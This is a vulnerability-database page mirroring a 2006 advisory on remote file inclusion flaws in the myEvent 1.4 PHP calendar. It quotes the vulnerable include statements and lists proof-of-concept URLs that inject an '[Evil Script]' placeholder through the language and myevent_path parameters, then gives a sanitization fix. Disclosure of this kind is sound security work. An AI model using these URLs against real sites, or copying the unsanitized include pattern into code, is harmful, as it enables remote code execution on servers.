Lucene search

K

myEvent14.txt

🗓️ 27 Aug 2006 00:00:00Reported by Sh3llType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 59 Views

myEvent 1.4 Multiple Remote File Include Vulnerabilities. Affected Software: myEvent 1.4, Risk: High, Summary: Dynamic Calendar Based Events Management System

Show more

AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

Code
`---------------------------------------------------------------------------------------  
myEvent 1.4 Multiple Remote File Include Vulnerabilities  
---------------------------------------------------------------------------------------  
Author : Sh3ll  
Date : 2006/08/11  
HomePage : http://www.sh3ll.ir  
Contact : sh3ll[at]sh3ll[dot]ir  
---------------------------------------------------------------------------------------  
Affected Software Description:  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
Application : myEvent  
version : 1.4  
Venedor : http://www.mywebland.com  
Class : Remote File Inclusion  
Risk : High  
Summary :   
myEvent Is a Dynamic Calendar Based Events Management System.  
---------------------------------------------------------------------------------------  
Vulnerability:  
~~~~~~~~~~~~~  
in admin.php , event.php , initialize.php , myevent.php , viewevent.php We Found   
Vulnerability Script  
----------------------------------------admin.php--------------------------------------  
....  
<?php  
include_once($language);  
?>  
...  
----------------------------------------event.php--------------------------------------  
....  
<?php  
  
include_once $myevent_path."includes/template.php";  
?>  
...  
--------------------------------------initialize.php-----------------------------------  
....  
<?php  
  
include $myevent_path."config.php";  
include $myevent_path.$language;  
include_once $myevent_path."includes/template.php"  
?>  
...  
----------------------------------------myevent.php------------------------------------  
....  
<?php  
include_once $myevent_path."initialize.php";  
?>  
...  
---------------------------------------viewevent.php-----------------------------------  
....  
<?php  
  
include_once $myevent_path."initialize.php";  
?>  
...  
---------------------------------------------------------------------------------------  
PoC:  
~~~  
http://www.target.com/[myEvent]/admin.php?language=[Evil Script]  
http://www.target.com/[myEvent]/event.php?myevent_path=[Evil Script]  
http://www.target.com/[myEvent]/initialize.php?myevent_path=[Evil Script]  
http://www.target.com/[myEvent]/myevent.php?myevent_path=[Evil Script]  
http://www.target.com/[myEvent]/viewevent.php?myevent_path=[Evil Script]  
  
Solution:  
~~~~~~~~  
Sanitize Variabel $language in admin.php & Sanitize Variabel $myevent_path in admin.php  
event.php , initialize.php , myevent.php , viewevent.php  
----------------------------------------------------------------------------------------  
Note:  
~~~~  
Venedor Contacted, But No Response. So Do a Dirty Patch.  
----------------------------------------------------------------------------------------  
Shoutz:  
~~~~~~  
~ Special Greetz To My Best Friend N4sh3n4s & My GF Atena  
~ To All My Friends in Xmors - Aria - Hackerz & Other Iranian Cyber Teams   
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
27 Aug 2006 00:00Current
7.4High risk
Vulners AI Score7.4
59
.json
Report